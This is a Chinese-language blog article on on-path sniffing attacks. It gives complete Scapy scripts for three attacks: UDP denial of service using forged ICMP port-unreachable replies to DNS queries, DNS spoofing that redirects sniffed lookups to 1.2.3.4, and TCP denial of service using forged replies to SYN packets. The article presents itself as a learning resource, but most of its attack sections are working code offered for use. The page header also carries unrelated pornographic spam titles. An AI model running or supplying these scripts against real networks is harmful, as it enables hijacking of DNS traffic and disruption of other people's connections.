国产xxxx99真实实拍_久久不雅视频_高清韩国a级特黄毛片_嗯老师别我我受不了了小说

資訊專欄INFORMATION COLUMN

網絡安全 - 旁路監(jiān)聽攻擊技術

CoderBear / 1412人閱讀

摘要:部分來自網絡,適用于學習,維護網絡安全,做合法公民一和不同,沒有面向連接的機制,其是一種不可靠的協(xié)議,沒有確認機制。

部分來自網絡,適用于學習,維護網絡安全,做合法公民

一、UDP

和TCP不同,UDP沒有面向連接的機制,其是一種不可靠的協(xié)議,沒有確認機制。也就是說只要其端口開放,有數據需要交互時直接進行數據交互,也不需要TCP的三次握手。這樣的話,基于UDP的攻擊比基于TCP的攻擊需要分析的條件相對少了一些。

下面是Python實現過程:

1、配置環(huán)境

本人使用的是Win7 64位系統(tǒng),Python2.7.9,Scapy2.3.3(Python版本必須>=2.7.9,因為Scapy其它版本缺少模塊)。

安裝Python后,下載 setuptools-36.2.0 ,解壓到任意目錄下,運行:

運行成功后,會生成Script目錄,里面就是下載Python模塊的工具了:

接下來我們安裝Scapy2.3.3:

以上我們就將環(huán)境配置好了。

2、安裝抓包工具 Wireshark

Wireshark使用起來很簡單,這里不做過多介紹。抓包工具有很多,下面介紹幾款流行抓包工具:Wireshark、Fiddler(可抓取網站或手機數據包,可支持Https)、Burpsuite、tcpdump(Linux自帶工具)、airodump-ng(Wifi滲透,可顯示路由器的BSSID ESSID,以及所有連接的客戶端。但需要一款可監(jiān)聽注入的網卡)等等。

運行Wireshark,點擊監(jiān)聽的網絡:

接下來我們 ping www.baidu.com 會抓到什么包?

上圖依次為DNS域名查詢請求與響應,成功返回ip。以上就是一次DNS域名解析的過程。

查詢網卡詳細信息:

3、實施攻擊

3.1、UDP DOS

因為UDP是無連接的,同一個連接中的報文與前面或后面的報文都沒有直接關系。因此對其DOS攻擊不像TCP那樣只需要發(fā)送一個reset包就可以干掉一個TCP連接那樣簡單,針對UDP的DOS需要將每個報文都DOS掉,不然應用層的重傳機制還是會重傳相應數據以保持會話與交互的數據完整。因此針對UDP的DOS攻擊一般情況下都是針對UDP的輕量化應用進行攻擊,如DNS這種小量交互的報文,而不是P2P這種大量報文交互的應用。

因此對其進行DOS非常簡單,只需要監(jiān)聽網絡中的DNS流量,有DNS查詢時,直接返回一個ICMP Port unreachable報文即可,表示端口沒有開放。若為TCP的應用,其端口沒有開放時,一般回應一個reset報文。并且有一點一定要保證,就是ICMP port unreachable報文一定要比正常的DNS 響應報文早到客戶端,這樣才可以達到DOS的效果。

部分代碼做了注釋:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網卡,替換成之前所保存的網卡信息,linux需在sniff()中指定網卡

# DNS響應的地址,隨機ip字段的id和ttl
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)

def buying(mots):

    resp = Ether()/IP()/ICMP()/IP()/UDP()

    #構造ICMP報文
    resp[ICMP].type = 3
    resp[ICMP].code = 3
    resp[ICMP][IP].src = mots[IP].src
    resp[ICMP][IP].dst = mots[IP].dst
    resp[ICMP][IP].ttl = ipttl
    resp[ICMP][IP].id = ipid
    resp[ICMP][UDP].sport = mots[UDP].sport
    resp[ICMP][UDP].dport = mots[UDP].dport

    #構造IP包頭
    resp[IP].src = mots[IP].dst
    resp[IP].dst = mots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構造以太網包頭
    resp[Ether].src = mots[Ether].dst
    resp[Ether].dst = mots[Ether].src

    #發(fā)送構造的ICMP響應包
    sendp(resp, count = 100)

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying, filter="udp dst port 53") # 嗅探,過濾upd目標端口53

命令行運行Python程序,然后再次 ping www.baidu.com,出現以下情況:

由于DNS使用UDP,而UDP是一種不可靠的協(xié)議,其存在丟包的可能,因此DNS為了保證應用的可靠性,一般的DNS查詢都是發(fā)送多個,當前面一個查詢失敗時,會繼續(xù)發(fā)送DNS查詢報文。如果第一個DNS查詢被DOS了,但是第二個DNS時卻被正常響應了。所以導致DNS結果還是正常的。

3.2、UDP 欺騙

很簡單,在監(jiān)聽到客戶端發(fā)送請求時,發(fā)送一個偽造的響應,并且比正常的響應早到,這樣即可達到欺騙的效果。實際攻擊還是攻擊輕量化的應用,流量較大的攻擊效果不一定明顯,且成本很大。還是以DNS為測試目標吧。DNS污染在運營商里做的比較多,原理很簡單:利益。并且其實現起來具有天然優(yōu)勢,可以在關鍵鏈路和節(jié)點進行分光監(jiān)聽并發(fā)送偽造的數據包。

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網卡,linux需在sniff()中指定網卡

# DNS響應的地址,隨機ip字段的id和ttl
rdata = "1.2.3.4"
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)

def buying(mots):

    resp = Ether()/IP()/UDP()/DNS()

    #構造DNS相關字段
    resp[DNS].qr = 1
    resp[DNS].rd = 1
    resp[DNS].qdcount = 1
    resp[DNS].ancount = 1
    resp[DNS].id = mots[DNS].id
    resp[DNS].qd = mots[DNS].qd
    resp[DNS].an = DNSRR(type="A",rclass="IN",ttl=1800,rdata=rdata)
    resp[DNS].an.rrname = mots[DNS].qd.qname

    #構造UDP相關字段
    resp[UDP].dport = mots[UDP].sport
    resp[UDP].sport = mots[UDP].dport

    #構造IP包頭
    resp[IP].src = mots[IP].dst
    resp[IP].dst = mots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構造以太網包頭
    resp[Ether].src = mots[Ether].dst
    resp[Ether].dst = mots[Ether].src

    #發(fā)送構造的DNS響應包
    sendp(resp)
    print("DNS響應為:",mots[DNS].qd.qname,"->",rdata)

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying,filter="udp dst port 53")

命令行運行Python程序,然后再次 ping www.baidu.com,出現以下情況:

以上就成功進行了UDP欺騙,將百度重定向到1.2.3.4上。

二、TCP

比如探測某一端口是否開放時,一般發(fā)送SYN,若其端口開放,對方回應SYN+ACK;若端口不開放,則回應reset。所以針對TCP的應用,我們進行DOS時,可以監(jiān)聽其SYN包,一旦有客戶端發(fā)送SYN,直接給其回應reset,并且保證偽造的reset比正常的響應包早到,即可達到DOS的效果。

1、配置環(huán)境

與UDP配置相同

2、實施攻擊

2.1、TCP DOS

#!/usr/bin/python
# -*- coding: utf-8 -*-

import random
from scapy.all import *
from scapy.arch.windows import compatibility

# 防止scapy2.3.3版本中出現log_runtime錯誤
compatibility.log_runtime = log_runtime
compatibility.MTU = MTU
compatibility.PcapTimeoutElapsed = PcapTimeoutElapsed
compatibility.ETH_P_ALL = ETH_P_ALL
compatibility.plist = plist
compatibility.sniff(1)

conf.iface = "Intel(R) Ethernet Connection I217-LM" # 綁定網卡,linux需在sniff()中指定網卡

#隨機ip字段的id和ttl
ipid = random.randint(1,65535)
ipttl = random.randint(45,80)
tcpseq = random.randint(1,4294967295)

def buying(tcpmots):

    resp = Ether()/IP()/TCP()

    #構造TCP相關字段
    resp[TCP].dport = tcpmots[TCP].sport
    resp[TCP].sport = tcpmots[TCP].dport
    resp[TCP].ack = 0 # ack大小可以任意指定
    resp[TCP].flags = "SA"
    resp[TCP].window = 0

    # 構造IP包頭
    resp[IP].src = tcpmots[IP].dst
    resp[IP].dst = tcpmots[IP].src
    resp[IP].ttl = ipttl
    resp[IP].id  = ipid

    #構造以太網包頭
    resp[Ether].src = tcpmots[Ether].dst
    resp[Ether].dst = tcpmots[Ether].src

    #發(fā)送構造的TCP DOS 包
    sendp(resp,count=1)
    print("TCP DOS 攻擊",resp[IP].dst,"成功")

if __name__ == "__main__":
    print "start sniff"
    sniff(prn=buying,filter="tcp[tcpflags]&(tcp-syn)!=0 and tcp[tcpflags]&(tcp-ack)==0")

運行以上代碼:

大家實驗可能失敗的因素有很多,比如對DNS進行了加密、采用DNS延遲解析、網絡不穩(wěn)定都會對攻擊產生一定影響,不是每次攻擊都會成功,這點希望大家能注意到。

文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/40633.html

相關文章

  • CDN詳解

    摘要:在一個節(jié)點中,設備和本地負載均衡設備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內容分發(fā)網絡)全稱是 Content Delivery Network,建立并覆蓋在承載網之上、由分布在不同區(qū)域的邊緣節(jié)點服務器群組成的分布式網絡,替代傳統(tǒng)以 WEB Server 為中心的數據傳輸模式。 作用是將源內容發(fā)...

    番茄西紅柿 評論0 收藏0
  • CDN詳解

    摘要:在一個節(jié)點中,設備和本地負載均衡設備的連接方式有兩種一種是旁路方式,一種是穿越方式。 文章同步于Github Pines-Cheng/blog 什么是CDN CDN(內容分發(fā)網絡)全稱是 Content Delivery Network,建立并覆蓋在承載網之上、由分布在不同區(qū)域的邊緣節(jié)點服務器群組成的分布式網絡,替代傳統(tǒng)以 WEB Server 為中心的數據傳輸模式。 作用是將源內容發(fā)...

    ChristmasBoy 評論0 收藏0
  • UCloud 開啟負載均衡+WAF一鍵聯(lián)動,云原生能力賦能Web防護創(chuàng)新模式

    摘要:為使用七層負載均衡的用戶,提供安全高效的應用防護能力。基于負載均衡集群的運維能力,可快速進行擴容容災遷移的部署。伴隨著互聯(lián)網+時代的到來,Web系統(tǒng)作為企業(yè)IT業(yè)務的基本負載平臺,承載著各種不同種類的信息業(yè)務。但近年來針對Web應用的攻擊事件頻發(fā),也讓Web應用的安全防御面臨著諸多挑戰(zhàn)。國家互聯(lián)網應急中心報告就曾顯示,僅2020上半年國家信息安全漏洞共享平臺(CNVD)收錄通用型安全漏洞11...

    Tecode 評論0 收藏0

發(fā)表評論

0條評論

CoderBear

|高級講師

TA的文章

閱讀更多
最新活動
閱讀需要支付1元查看
<